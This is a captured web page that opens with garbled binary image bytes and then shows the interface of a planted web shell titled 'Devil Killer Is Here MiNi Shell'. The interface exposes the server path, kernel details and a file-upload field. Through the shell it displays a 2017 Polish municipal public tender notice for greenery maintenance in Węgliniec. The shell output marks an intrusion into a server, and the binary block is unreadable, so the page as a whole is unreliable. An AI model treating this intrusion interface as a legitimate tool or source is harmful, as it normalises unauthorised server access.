JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170306/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170306/37146-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.wegliniec.pl' target='_blank'>http://www.wegliniec.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 37146 - 2017
              z dnia 2017-03-06 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Węgliniec: Utrzymanie zieleni na terenie Gminy i Miasta Węgliniec w  latach 2017 i 2018 <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Węgliniec, krajowy numer identyfikacyjny
              23082141100000, ul.
              ul. Sikorskiego 
              3,
              59940  
              Węgliniec, woj.
              dolnośląskie, państwo
              Polska, tel.
              075 77 11 435, e-mail
              wegliniec@wegliniec.pl, faks
              075 77 12 551.
              <br />
              Adres strony internetowej (URL): www.wegliniec.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.wegliniec.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w formie pisemnej za pośrednictwem operatora pocztowego, kurierem lub osobiście<br />
                Adres:
                <br />Urząd Gminy i Miasta Węgliniec,ul. Sikorskiego 3, 59 - 940 Węgliniec </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Utrzymanie zieleni na terenie Gminy i Miasta Węgliniec w  latach 2017 i 2018 <br /><b>Numer referencyjny: </b>UR.271.3.2017.ZP<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiotem zamówienia jest realizacja usług w zakresie utrzymania zieleni na terenie Gminy i Miasta Węgliniec w  latach 2017 i 2018 w podziale na oferty częściowe 

2. Istotne informacje dotyczące przedmiotu zamówienia:
2.1.	Zakres wykonywanych prac ogrodniczych i porządkowych należy skalkulować łącznie z wywozem odpadów (w tym pokos, obcięte gałęzie, zgrabione liście, przekwitłe kwiaty itp.), nie przewiduje się składowania powstałych odpadów po wykonaniu usługi celem ich wywozu w innym dniu niż w dniu wykonanej usługi.
2.2.	Koszty zakupu nawozów mineralnych, roślin kwiatowych, wieloletnich krzewów,  worków, wynajęcia kontenerów, wywozu i utylizacji odpadów ponosi wykonawca.
2.3.	Wodę do podlewania zapewnia wykonawca a koszt własny.
2.4.	Prace składające się na przedmiot umowy muszą być wykonane zgodnie z obowiązującymi polskimi normami i przepisami prawa z zachowaniem wymagań obowiązujących przepisów w szczególności bhp, ppoż., i branżowych , zgodnie ze sztuką ogrodową oraz należytą starannością w ich wykonaniu, dobrą jakością, właściwą organizacją pracy i uzgodnieniami dokonanymi w trakcie realizacji przedmiotu umowy. 
2.5.	Koszenie trawników przy drzewach należy prowadzić tak aby nie uszkodzić roślin. W przypadku uszkodzenia roślin wykonawca zobowiązany jest do nasadzeń rekompensujących szkody. 
2.6.	Za bezpieczeństwo ruchu w obrębie odcinka, na którym wykonywane będą prace, odpowiedzialny jest wykonawca.
2.7.	Przed wysadzeniem kwiatów wykonawca uzgodni z zamawiającym gatunki oraz wzór ich posadzenia.
2.8.	Przed rozpoczęciem prac Wykonawca sporządzi harmonogram prac na dany miesiąc i przedstawi go do zatwierdzenia zamawiającemu. 
2.9.	Zgodnie z przedstawionym harmonogramem stwierdzenie wykonania prac bezpośrednio po ich wykonaniu oraz ich poprawność będą zatwierdzane prze sołtysów miejscowości lub wyznaczonego przedstawiciela zamawiającego. 
2.10.	Każde koszenie obowiązkowo musi być zatwierdzone przez Sołtysa lub przedstawiciela Zamawiającego a wykaszanie traw i usuwanie krzewów z pasów drogowych ma być zatwierdzane wraz z podaniem dokładnej lokalizacji (np. nazwa ulicy, nr posesji) oraz długości wykonanego koszenia  zgodnie z Formularzem nr 9 do siwz - karta odbioru koszenia.
2.11.	W okresie trwania umowy Wykonawca ma obowiązek zapewnienia stałego kontaktu z zamawiającym wskazując dwa numery telefonu celem przyjmowania zgłoszeń przekazywanych przez zamawiającego.
2.12.	Zasady rozliczania się zamawiającego z Wykonawcą zawarte są w projekcie umowy.
2.13.	Każdy z Wykonawców winien zapoznać się z terenem świadczenia usług celem sprawdzenia warunków terenowych  związanych z wykonaniem prac będących przedmiotem przetargu, jak tez celem uzyskania dodatkowych jakichkolwiek informacji koniecznych i przydatnych do wyceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania zamówienia. 
2.14.	Posiadanie biura oraz bazy w celu zgromadzenia niezbędnego sprzętu w odległości nie większej niż 40 km od granic gminy  Węgliniec. 
2.15.	Wykonawca stosując środki ochrony roślin winien prowadzić i przechowywać dokumentację z tym związaną i okazać na żądanie Zamawiającego oraz zobowiązany jest do posiadania odpowiedniego sprzętu do stosowania środków ochrony roślin.

3.	Nazwy i kody dotyczące opisujące przedmiot zamówienia (CPV):

CPV  77310000-6  usługi sadzenia roślin oraz utrzymania terenów zielonych

4. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. Zamawiający żąda wskazania w ofercie części zamówienia, których wykonanie wykonawca zamierza powierzyć podwykonawcy i podania nazw (firm) podwykonawców. Zamawiający żąda od wykonawcy przedstawienia dokumentów i oświadczeń potwierdzających brak podstaw do wykluczenia, dotyczących podwykonawcy, któremu zamierza powierzyć wykonanie części zamówienia. 
6.. Jeżeli powierzenie podwykonawcy wykonania części zamówienia nastąpi w trakcie jego realizacji, wykonawca na żądanie zamawiającego przedstawia oświadczenie, o którym mowa w art. 25 a ust. 1 ustawy Pzp, lub oświadczenia lub dokumenty potwierdzające brak podstaw wykluczenia wobec tego podwykonawcy. 
7. Jeżeli zamawiający stwierdzi, że wobec danego podwykonawcy zachodzą podstawy wykluczenia, wykonawca obowiązany jest zastąpić tego podwykonawcę lub zrezygnować z powierzenia wykonania części zamówienia podwykonawcy. 
8. Zapisy, o których mowa w pkt. od 6 do 7 niniejszego rozdziału SIWZ stosuje się wobec dalszych podwykonawców. 
9.	Zamawiający nie zastrzega obowiązku osobistego wykonania zamówienia przez wykonawcę.
10.	Wymagania dotyczące zatrudnienia na umowę o pracę zgodnie z przepisem art. 29 ust. 3a ustawy Pzp. 
1)	Zamawiający wymaga zatrudnienia na podstawie umowy o pracę,                                   w rozumieniu ustawy z dnia 26 czerwca 1974 r.  Kodeks pracy (tekst jednolity z 2016r. Dz. U. poz. 1666 ze zm.), przez wykonawcę lub podwykonawcę (jeżeli wykonawca powierza wykonanie części zamówienia podwykonawcy), osób wykonujących wskazane poniżej czynności w trakcie realizacji zamówienia  czynności związane z koszeniem i utrzymaniem zieleni
2)	Wykonawca musi zatrudniać osoby wykonujące wyżej wymienione czynności na podstawie umowy o pracę, a w przypadku rozwiązania umowy przez osobę zatrudnioną lub przez pracodawcę, wykonawca zobowiązuje się do zatrudnienia na podstawie umowy o pracę na to miejsce innej osoby wykonującej  ww. czynności.
3)	W terminie do 3 dni od dnia podpisania umowy wykonawca złoży zamawiającemu oświadczenie, zawierające informację o zatrudnionych osobach, o czasie trwania umowy oraz czynnościach wykonywanych przez wskazane osoby. Wzór oświadczenia, o którym mowa w niniejszym podpunkcie stanowi Formularz nr 8 do siwz. 
4)	W trakcie realizacji zamówienia zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec wykonawcy odnośnie spełniania przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy  o pracę osób wykonujących wskazane w podpunkcie 1 czynności. Zamawiający uprawniony jest w szczególności do: 
a)	żądania oświadczeń i dokumentów w zakresie potwierdzenia spełniania ww. wymogów i dokonywania ich oceny,
b)	żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania ww. wymogów,
c)	przeprowadzenia kontroli na miejscu wykonywania świadczenia.
5) postanowienia, dotyczące dokumentowania realizacji zamówienia przy udziale osób zatrudnionych na podstawie umowy o pracę oraz sankcje za nieprzestrzeganie ww. warunków realizacji zamówienia zostały opisane  w projekcie umowy  formularz nr 7 do SIWZ. 

<br /><br /><b>II.5) Główny kod CPV: </b>77310000-6<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                1. Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp o wartości:
Zadanie nr 1  do 40% wartości zamówienia podstawowego
Zadanie nr 2  do 40% wartości zamówienia podstawowego
Zadanie nr 3  do 40% wartości zamówienia podstawowego
Zadanie nr 4  do 40% wartości zamówienia podstawowego
2.Zamówienia, o których mowa w pkt  1 polegać będą na powtórzeniu czynności objętych przedmiotem zamówienia podstawowego. Zamówienia te będą mogły zostać udzielone gdy będzie to korzystne dla Zamawiającego  lub zajdzie potrzeba ich wykonania. Ponadto zamówienia te będą mogły zostać udzielone po zabezpieczeniu odpowiednich środków finansowych na sfinansowanie zamówienia. 
<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/10/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1)	wykonali, a w przypadku świadczeń okresowych lub ciągłych wykonują usługi w  okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej jedną usługę związaną z utrzymaniem zieleni obejmującą pielęgnację roślin w parkach lub/i na skwerach lub/i w przydrożnych pasach zieleni lub/i na pasach zieleni o  pow. nie mniejszej niż 0,80 ha - dotyczy zadania nr 1, zadania nr 2 i zadania nr 4. 
2)	 dysponują następującym potencjałem technicznym: 
      a) co najmniej jednym pojazdem przystosowanym do zbiórki i transportu odpadów 
      b) co najmniej jednym traktorem  kosiarką z koszem
      c) co najmniej dwoma kosami spalinowymi
      d) co najmniej jedną dmuchawą spalinową
      e) co najmniej dwoma kosiarkami żyłowymi
oraz złożą informację o podstawie do dysponowania tymi zasobami (należy podać podstawę do dysponowania, np. własność, najem, dzierżawa, leasing, użyczenie, inne) - Wykonawca złoży oświadczenie o dysponowaniu bądź poleganiu na zasobach innych podmiotów w tym zakresie  dotyczy zadania nr 1, zadania nr 2 i zadania nr 3 i zadania nr 4. 
3)	dysponują odpowiednim potencjałem zawodowym, tj. co najmniej 1 osobą posiadająca uprawnienia do wykonywania oprysków środkami ochrony roślin wraz z informacją na temat kwalifikacji zawodowych, uprawnień doświadczenia i wykształcenia oraz informacją  o podstawie do dysponowania tą osobą  dotyczy zadania nr 1, zadania nr 2 i zadania nr 3 i zadania nr 4. 
Zamawiający dopuszcza także odpowiadające im uprawnienia nabyte w państwach członkowskich Unii Europejskiej na zasadach określonych  w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394 ze zm.).
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1) Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli
odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw
wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp. 2) Oświadczenie wykonawcy o braku wydania
wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z
uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo  w przypadku
wydania takiego wyroku lub decyzji  dokumentów potwierdzających dokonanie płatności tych należności
wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych
należności, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 1 pkt. 15 ustawy
Prawo zamówień publicznych. 3) Oświadczenie wykonawcy o braku orzeczenia wobec niego tytułem środka
zapobiegawczego zakazu ubiegania się o zamówienia publiczne. 4) Wykonawca, który powołuje się na
zasoby innych podmiotów, na zasadach określonych w art. 22a ustawy Pzp, w celu wykazania istnienia
wobec nich braku podstaw do wykluczenia zobowiązany jest przedstawić dokumenty w stosunku do tych
podmiotów, o których mowa w pkt 7 ppkt od 1 do 3 rozdziału X SIWZ. 5) Zamawiający żąda od wykonawcy
przedstawienia dokumentów i oświadczeń potwierdzających brak podstaw do wykluczenia, o których mowa
w pkt. 7 ppkt od 1 do 3 rozdziału X SIWZ dotyczących podwykonawcy, któremu zamierza powierzyć
wykonanie części zamówienia.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji z otwarcia ofert, o
której mowa w rozdziale XV pkt 9 SIWZ, zobowiązany jest przekazać zamawiającemu oświadczenie o
przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt
23 ustawy Pzp. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z
innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
Propozycja treści oświadczenia  Formularz Nr 5 do SIWZ. Ponadto, do oferty wykonawca musi dołączyć
następujące dokumenty: 1) wypełniony formularz ofertowy - Formularz Nr 1 do SIWZ, 2) pisemne
zobowiązanie, o którym mowa w rozdziale VIII pkt 9 ppkt 1 SIWZ, w przypadku gdy wykonawca zamierza
polegać zasobach innych podmiotów, 3) pełnomocnictwo do podpisania oferty i jej załączników, zgodnie z
zapisami rozdziału XIV pkt 15 i 16 SIWZ, o ile prawo do podpisywania oferty nie wynika z innych
dokumentów złożonych wraz z ofertą.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg ograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
